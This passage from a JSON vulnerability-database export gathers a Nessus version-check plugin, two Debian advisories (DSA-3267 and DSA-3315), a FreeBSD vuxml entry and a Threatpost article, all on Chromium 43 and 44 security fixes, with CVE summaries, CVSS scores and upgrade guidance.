way to bypass the Same Origin Policy was discovered.\n\n - CVE-2015-1268\n Mariusz Mlynski also discovered a way to bypass the Same\n Origin Policy.\n\n - CVE-2015-1269\n Mike Rudy discovered that hostnames were not properly\n compared in the HTTP Strict Transport Policy and HTTP\n Public Key Pinning features, which could allow those\n access restrictions to be bypassed.\n\n - CVE-2015-1270\n Atte Kettunen discovered an uninitialized memory read in\n the ICU library.\n\n - CVE-2015-1271\n cloudfuzzer discovered a buffer overflow in the pdfium\n library.\n\n - CVE-2015-1272\n Chamal de Silva discovered race conditions in the GPU\n process implementation.\n\n - CVE-2015-1273\n makosoft discovered a buffer overflow in openjpeg, which\n is used by the pdfium library embedded in chromium.\n\n - CVE-2015-1274\n andrewm.bpi discovered that the auto-open list allowed\n certain file types to be executed immediately after\n download.\n\n - CVE-2015-1276\n Colin Payne discovered a use-after-free issue in the\n IndexedDB implementation.\n\n - CVE-2015-1277\n SkyLined discovered a use-after-free issue in chromium's\n accessibility implementation.\n\n - CVE-2015-1278\n Chamal de Silva discovered a way to use PDF documents to\n spoof a URL.\n\n - CVE-2015-1279\n mlafon discovered a buffer overflow in the pdfium\n library.\n\n - CVE-2015-1280\n cloudfuzzer discovered a memory corruption issue in the\n SKIA library.\n\n - CVE-2015-1281\n Masato Knugawa discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2015-1282\n Chamal de Silva discovered multiple use-after-free\n issues in the pdfium library.\n\n - CVE-2015-1283\n Huzaifa Sidhpurwala discovered a buffer overflow in the\n expat library.\n\n - CVE-2015-1284\n Atte Kettunen discovered that the maximum number of page\n frames was not correctly checked.\n\n - CVE-2015-1285\n gazheyes discovered an information leak in the XSS\n auditor, which normally helps to prevent certain classes\n of cross-site scripting problems.\n\n - CVE-2015-1286\n A cross-site scripting issue was discovered in the\n interface to the v8 JavaScript library.\n\n - CVE-2015-1287\n filedescriptor discovered a way to bypass the Same\n Origin Policy.\n\n - CVE-2015-1288\n Mike Ruddy discovered that the spellchecking\n dictionaries could still be downloaded over plain HTTP\n (related to CVE-2015-1263 ).\n\n - CVE-2015-1289\n The chrome 44 development team found and fixed various\n issues during internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1266\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1268\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1269\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1270\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1276\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1282\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1287\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1288\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1289\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3315\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 44.0.2403.89-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"44.0.2403.89-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"44.0.2403.89-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"44.0.2403.89-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"44.0.2403.89-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"44.0.2403.89-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3267-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nMay 22, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : chromium-browser\r\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\r\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\r\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\r\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\r\n\r\nSeveral vulnerabilities were discovered in the chromium web browser.\r\n\r\nCVE-2015-1251\r\n\r\n SkyLined discovered a use-after-free issue in speech recognition.\r\n\r\nCVE-2015-1252\r\n\r\n An out-of-bounds write issue was discovered that could be used to\r\n escape from the sandbox.\r\n\r\nCVE-2015-1253\r\n\r\n A cross-origin bypass issue was discovered in the DOM parser.\r\n\r\nCVE-2015-1254\r\n\r\n A cross-origin bypass issue was discovered in the DOM editing feature.\r\n\r\nCVE-2015-1255\r\n\r\n Khalil Zhani discovered a use-after-free issue in WebAudio.\r\n\r\nCVE-2015-1256\r\n\r\n Atte Kettunen discovered a use-after-free issue in the SVG\r\n implementation.\r\n\r\nCVE-2015-1257\r\n\r\n miaubiz discovered an overflow issue in the SVG implementation.\r\n\r\nCVE-2015-1258\r\n\r\n cloudfuzzer discovered an invalid size parameter used in the\r\n libvpx library.\r\n\r\nCVE-2015-1259\r\n\r\n Atte Kettunen discovered an uninitialized memory issue in the\r\n pdfium library.\r\n\r\nCVE-2015-1260\r\n\r\n Khalil Zhani discovered multiple use-after-free issues in chromium's\r\n interface to the WebRTC library.\r\n\r\nCVE-2015-1261\r\n\r\n Juho Nurminen discovered a URL bar spoofing issue.\r\n\r\nCVE-2015-1262\r\n\r\n miaubiz discovered the use of an uninitialized class member in\r\n font handling.\r\n\r\nCVE-2015-1263\r\n\r\n Mike Ruddy discovered that downloading the spellcheck dictionary\r\n was not done over HTTPS.\r\n\r\nCVE-2015-1264\r\n\r\n K0r3Ph1L discovered a cross-site scripting issue that could be\r\n triggered by bookmarking a site.\r\n\r\nCVE-2015-1265\r\n\r\n The chrome 43 development team found and fixed various issues\r\n during internal auditing. Also multiple issues were fixed in\r\n the libv8 library, version 4.3.61.21.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 43.0.2357.65-1~deb8u1.\r\n\r\nFor the testing distribution (stretch), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 43.0.2357.65-1.\r\n\r\nWe recommend that you upgrade your chromium-browser packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJVXrgRAAoJELjWss0C1vRzS5Mf/iSPN/47Wt02hBpAGEMEjirv\r\n4Ee3gJ/Sb/z8EtE7GsZOxci1AsJQYZusm5T6rcwl3Bu3Rnsjj7swZg7cMJBb73+L\r\nhfwl8xY47cjudXFc/V2wJWghjBozIrsaINSVgpEA6AiGl/5S4f941Hgz/Nik8sfg\r\n0r9hH2jU5o3BfYKViAZhjkOjxmXTlO9zPeFD4bA/FCo0YNyN9dIIJYbeBdvG+z5H\r\npOCs3L6QnDyVqu/Zcpi7BtqilDvseV9QGagqg0WpbYimnqvjeeWQAlsKE9+NhwDY\r\nDQ+NufPSPpL3hu+xxPm1kLLndiKRGb5S253Rl+8kWgeKa+UgvdWKePdtQYaidjSK\r\nuVF+8s5en36D0Mr/OOC3a0ZImMsinky+6mg4AjWuZwo+AirZ+DQVTkxMRS9T6l9k\r\nFR3h//VYnqBihbuYrJnRunFjo1RFzLM2P7NiMBAJOhAuVAK4OSpN0pWb/KJN23Ch\r\nQ1C9vdq413VCtgsUuMYc2pqoc/XDBK5CNjtgtm+e9ZdPOKg7A7POuvw7QIv+g3me\r\niRmkc1evjwa9/nkFzgF7HpcoHv25YdrktsF5IfVOXEZL+AkIhViIDe/rIkuxDvz1\r\nuGQFLh+NRWnAeXM89NNrFJ7wmpJoG/PbNWZ44HYa0nQoVz/ygaw827U88FxgoZsD\r\nPVvRVC9cV2S2OpOU1gMg8O5mbQi/g2HQVOEdM/rjoot8W2/K7zfmYVFghFAoNBp5\r\nkAfj3j9c3yHKZ18wFqF+yvcmWBBWGIQvd62s23hKVb7PW09ShArvYp+U7bMwcVfB\r\nV5q9hboqgGVjcyd32BIT1ZW3zSyZ9Jaamw3nLVc2ro8jlnb3UqOK2Kkzb87tBfWU\r\n/ga1nLgy6bg9H3au21/6f+ReP2X96Y4KA2sb3gqhI2FVtJ864anbJM4KcOR3nsV6\r\nm1QqfkksTx8EUlca/k65zDHt7bveQValM437V/OspnqSMt/dquDKJxiRY9Kb/wWZ\r\nAo3QzrLb349xEvxq1vqz1DEiZ2a+w9xA9FPaBXXMinX+93kK5ZJZbIlcn0FQbMgx\r\n7MIWSBI0EutMfoMhexB+7BEdVBRvr0QppxMFJYlJwl+o5nY7aANtboEoU/tqOiaO\r\n/+gQL8evd5Fh6IaC1WMWwXcpypPqaDWzXF1ExkGRpwWO6Dm67k97k79r1ntzVs7o\r\nuDz+/V0cKTm2mL0FxK7+DEyxsxb3SgKD6Fymd3tiknD/hXOsKZkoCKMh5XLzWWBP\r\nPU0DRS/WysA+bGIvqR29GWHADQUvj1A6DjkMIinkitGdaOysn8RlENFZX39XQ94r\r\nEjpXvjyw9rkRZtwMeGDTcUJxoeWNCyRBjJMcEuSeCKmOratYaOMgVpvQeGR4Xno=\r\n=GyQo\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2015-05-25T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2015-05-25T00:00:00", "id": "SECURITYVULNS:DOC:32136", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32136", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:51:19", "description": "No description provided", "cvss3": {}, "published": "2015-05-25T00:00:00", "type": "securityvulns", "title": "Google Chrome / Chromium multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1247", "CVE-2015-1257", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1250", "CVE-2015-1253", "CVE-2015-3336", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1243", "CVE-2015-1252", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1256", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1261", "CVE-2015-1237", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1238", "CVE-2015-1264", "CVE-2015-1249"], "modified": "2015-05-25T00:00:00", "id": "SECURITYVULNS:VULN:14435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14435", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:00", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3315-1 security@debian.org\r\nhttps://www.debian.org/security/ Michael Gilbert\r\nJuly 23, 2015 https://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : chromium-browser\r\nCVE ID : CVE-2015-1266 CVE-2015-1267 CVE-2015-1268 CVE-2015-1269\r\n CVE-2015-1270 CVE-2015-1271 CVE-2015-1272 CVE-2015-1273\r\n CVE-2015-1274 CVE-2015-1276 CVE-2015-1277 CVE-2015-1278\r\n CVE-2015-1279 CVE-2015-1280 CVE-2015-1281 CVE-2015-1282\r\n CVE-2015-1283 CVE-2015-1284 CVE-2015-1285 CVE-2015-1286\r\n CVE-2015-1287 CVE-2015-1288 CVE-2015-1289\r\n\r\nSeveral vulnerabilities were discovered in the chromium web browser.\r\n\r\nCVE-2015-1266\r\n\r\n Intended access restrictions could be bypassed for certain URLs like\r\n chrome://gpu.\r\n\r\nCVE-2015-1267\r\n\r\n A way to bypass the Same Origin Policy was discovered.\r\n\r\nCVE-2015-1268\r\n\r\n Mariusz Mlynski also discovered a way to bypass the Same Origin Policy.\r\n\r\nCVE-2015-1269\r\n\r\n Mike Rudy discovered that hostnames were not properly compared in the\r\n HTTP Strict Transport Policy and HTTP Public Key Pinning features,\r\n which could allow those access restrictions to be bypassed.\r\n\r\nCVE-2015-1270\r\n\r\n Atte Kettunen discovered an uninitialized memory read in the ICU library.\r\n\r\nCVE-2015-1271\r\n\r\n cloudfuzzer discovered a buffer overflow in the pdfium library.\r\n\r\nCVE-2015-1272\r\n\r\n Chamal de Silva discovered race conditions in the GPU process\r\n implementation.\r\n\r\nCVE-2015-1273\r\n\r\n makosoft discovered a buffer overflow in openjpeg, which is used by\r\n the pdfium library embedded in chromium.\r\n\r\nCVE-2015-1274\r\n\r\n andrewm.bpi discovered that the auto-open list allowed certain file\r\n types to be executed immediately after download.\r\n\r\nCVE-2015-1276\r\n\r\n Colin Payne discovered a use-after-free issue in the IndexedDB\r\n implementation.\r\n\r\nCVE-2015-1277\r\n\r\n SkyLined discovered a use-after-free issue in chromium's accessibility\r\n implementation.\r\n\r\nCVE-2015-1278\r\n\r\n Chamal de Silva discovered a way to use PDF documents to spoof a URL.\r\n\r\nCVE-2015-1279\r\n\r\n mlafon discovered a buffer overflow in the pdfium library.\r\n\r\nCVE-2015-1280\r\n\r\n cloudfuzzer discovered a memory corruption issue in the SKIA library.\r\n\r\nCVE-2015-1281\r\n\r\n Masato Knugawa discovered a way to bypass the Content Security\r\n Policy.\r\n\r\nCVE-2015-1282\r\n\r\n Chamal de Silva discovered multiple use-after-free issues in the\r\n pdfium library.\r\n\r\nCVE-2015-1283\r\n\r\n Huzaifa Sidhpurwala discovered a buffer overflow in the expat\r\n library.\r\n\r\nCVE-2015-1284\r\n\r\n Atte Kettunen discovered that the maximum number of page frames\r\n was not correctly checked.\r\n\r\nCVE-2015-1285\r\n\r\n gazheyes discovered an information leak in the XSS auditor,\r\n which normally helps to prevent certain classes of cross-site\r\n scripting problems.\r\n\r\nCVE-2015-1286\r\n\r\n A cross-site scripting issue was discovered in the interface to\r\n the v8 javascript library.\r\n\r\nCVE-2015-1287\r\n\r\n filedescriptor discovered a way to bypass the Same Origin Policy.\r\n\r\nCVE-2015-1288\r\n\r\n Mike Ruddy discovered that the spellchecking dictionaries could\r\n still be downloaded over plain HTTP (related to CVE-2015-1263).\r\n\r\nCVE-2015-1289\r\n\r\n The chrome 44 development team found and fixed various issues\r\n during internal auditing.\r\n\r\nIn addition to the above issues, Google disabled the hotword extension\r\nby default in this version, which if enabled downloads files without\r\nthe user's intervention.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 44.0.2403.89-1~deb8u1.\r\n\r\nFor the testing distribution (stretch), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 44.0.2403.89-1.\r\n\r\nWe recommend that you upgrade your chromium-browser packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJVsi9LAAoJELjWss0C1vRziN0gALQ34XXl/qN5BlJrTH+8xaUm\r\nZUZYAqSJK+QgFOOVxXiMWDREsLV7OcQ8CgAbq/l+jumfaq2yY6uVo61xT+mlzIY5\r\naVT6t72NX3fUR9dVxiW31M0qnY3jfNFd0tBD2Q42Zuh7PvDspLYKKsytrcyz5oYJ\r\nGFbxrW2C7/8bUmhd+muzfYCQ5VHohNMaV+QgeEPy/XUrgFgjWJlEVDSFIS9UnGsZ\r\ny+bI4ssZjC3/+SeqkyIxBzeqUK7zbt3cDqpyEtEjI1e6KijkJRbazWh2Lc9qkWON\r\nVOzU0o0Sb/ftdCV0Rbkfakk2cj2F3WAoZh7nFzCMAdqRVzczfUZFzyOH4Ups30CZ\r\nqjHy2K+cqtmDg2egsuDKI7M7k8uWlSWo2J6hyLY1UKHei5QwP3nLkC6BQUaTXxCW\r\ngt1IlVF77eoBOXTnVOXj59OQdh1KKXsZ9IkQVi3c3JunKHeOgYRPey8jNEjTp0IV\r\n7YNew1a8RnsIpf8GwTqCM8YaVUcxxQE7sv1ya7k2C0QTGQpqUlyT8FV/P1ZembDJ\r\n6fpqn/IQWv98ztj3yuuJA6SwI5uDpE69u3JUuGCweGL8iMN+DU9cyWcxfIvvAewK\r\nCAEehgKVA1HKfBZoCmS1lky4QCJZrgHyxSe1c3CW0pDy/IfOvV54Xzr3Qn9Whx19\r\nkq/tOP3UcrfGjyy2oRPTdKFEC9qUufrRoZw39d1yvVxsqtEzZp9ri6mND4WPuZYf\r\ni5mVplBPJsvXOC5RXJ/pnSu8IrsbC5Qz9CxSlWLcDx+DjktUuMza6lawJyKh3QUK\r\nGUOXMG4bC5CilN+r2Fm41ZHW9ZUMHLcqnE/jBkvNUMw+Z+0i6noQkgG6t1CeIki5\r\nOeuEMuES3UU5joyRL24b4ejiUJxeIb9sik0WSrR4qelBeOLXFKyKNvpm243Nq/W5\r\nBMoFvQkmiF37IZ9naVmPUTwPmicTeD35wEs9XerMSvvAoKUfJtXMWglN0aP2hxK5\r\n2Dhr5ZAQ0jJTxIx/l6dV23hJNql0hCurFPF9tQxYZHDpl3WUS3YLs9Bj9mGz0AjH\r\nHAyuJrQWVMCT2gao//1I7T3O5JkrVTVXNVcY+1gg+HTE0iOxe20Uhiat0pd+TCW9\r\nops3rpYOjSDy2bpipdkxSblb5QNWN1SRmSywGuESESIPLKdmooeD3nyMBGA7bWVa\r\nFJukfJcBaDnGFfgMfQmEfckawvcGhErNQtXReqGQ3AYUn+/mYiV8gvVatn8x8dy9\r\nqpRHWM1VwVD5DsgxkeUTRyimOi374RrkCPx1olMwCkbNQiQJ9VTSK5Ji7HoOZz9P\r\nFazeCSZ1csx1HTx47ch+DvRfsJMnSDwbBst2aRAmRaInUu7qSb/VJwXtjdI6HRo=\r\n=0awE\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2015-07-26T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 3315-1] chromium-browser security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-1266", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-1268", "CVE-2015-1263", "CVE-2015-1267", "CVE-2015-1286", "CVE-2015-1289", "CVE-2015-1270", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1287", "CVE-2015-1282", "CVE-2015-1285", "CVE-2015-1276", "CVE-2015-1278", "CVE-2015-1269", "CVE-2015-1277", "CVE-2015-1271", "CVE-2015-1273", "CVE-2015-1280", "CVE-2015-1284"], "modified": "2015-07-26T00:00:00", "id": "SECURITYVULNS:DOC:32351", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32351", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2023-12-03T16:50:40", "description": "\n\nGoogle Chrome Releases reports:\n\n37 security fixes in this release, including:\n\n[474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit\n\t to anonymous.\n[464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit\n\t to anonymous.\n[444927] High CVE-2015-1254: Cross-origin bypass in Editing.\n\t Credit to armin@rawsec.net.\n[473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit\n\t to Khalil Zhani.\n[478549] High CVE-2015-1256: Use-after-free in SVG. Credit to\n\t Atte Kettunen of OUSPG.\n[481015] High CVE-2015-1251: Use-after-free in Speech. Credit\n\t to SkyLined working with HP's Zero Day Initiative.\n[468519] Medium CVE-2015-1257: Container-overflow in SVG.\n\t Credit to miaubiz.\n[450939] Medium CVE-2015-1258: Negative-size parameter in\n\t libvpx. Credit to cloudfuzzer\n[468167] Medium CVE-2015-1259: Uninitialized value in PDFium.\n\t Credit to Atte Kettunen of OUSPG\n[474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit\n\t to Khalil Zhani.\n[466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho\n\t Nurminen.\n[476647] Medium CVE-2015-1262: Uninitialized value in Blink.\n\t Credit to miaubiz.\n[479162] Low CVE-2015-1263: Insecure download of spellcheck\n\t dictionary. Credit to Mike Ruddy.\n[481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\n\t Credit to K0r3Ph1L.\n[489518] CVE-2015-1265: Various fixes from internal audits,\n\t fuzzing and other initiatives.\nMultiple vulnerabilities in V8 fixed at the tip of the 4.3\n\t branch (currently 4.3.61.21).\n\n\n\n", "cvss3": {}, "published": "2015-05-19T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-19T00:00:00", "id": "A9D456B4-FE4C-11E4-AD15-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/a9d456b4-fe4c-11e4-ad15-00262d5ed8ee.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:51", "description": "Google has patched a high-risk vulnerability in its Chrome browser that allows an attacker to escape the Chrome sandbox.\n\nThat vulnerability is one of 37 bugs fixed in version 43 of Chrome. Six of those flaws are rated as high risks and Google paid out more than $38,000 in rewards to researchers who reported vulnerabilities to the company. Among the other serious vulnerabilities are cross-origin bypasses and three use-after-free vulnerabilities.\n\nGoogle has not yet released the details of the vulnerabilities, so the nature and location of the sandbox-escape bug aren\u2019t clear. The company waits until most users have updated to the new version before releasing complete details of the vulnerabilities.\n\nHere are the public bugs fixed in Chrome 43:\n\n[$16337][[474029](<https://code.google.com/p/chromium/issues/detail?id=474029>)] High CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous.\n\n[$7500][[464552](<https://code.google.com/p/chromium/issues/detail?id=464552>)] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous.\n\n[$3000][[444927](<https://code.google.com/p/chromium/issues/detail?id=444927>)] High CVE-2015-1254: Cross-origin bypass in Editing. Credit to armin@rawsec.net.\n\n[$3000][[473253](<https://code.google.com/p/chromium/issues/detail?id=473253>)] High CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani.\n\n[$2000][[478549](<https://code.google.com/p/chromium/issues/detail?id=478549>)] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG.\n\n[[481015](<https://code.google.com/p/chromium/issues/detail?id=481015>)] High CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP\u2019s Zero Day Initiative \n\n[$1500][[468519](<https://code.google.com/p/chromium/issues/detail?id=468519>)] Medium CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz.\n\n[$1000][[450939](<https://code.google.com/p/chromium/issues/detail?id=450939>)] Medium CVE-2015-1258: Negative-size parameter in Libvpx. Credit to cloudfuzzer\n\n[$1000][[468167](<https://code.google.com/p/chromium/issues/detail?id=468167>)] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of 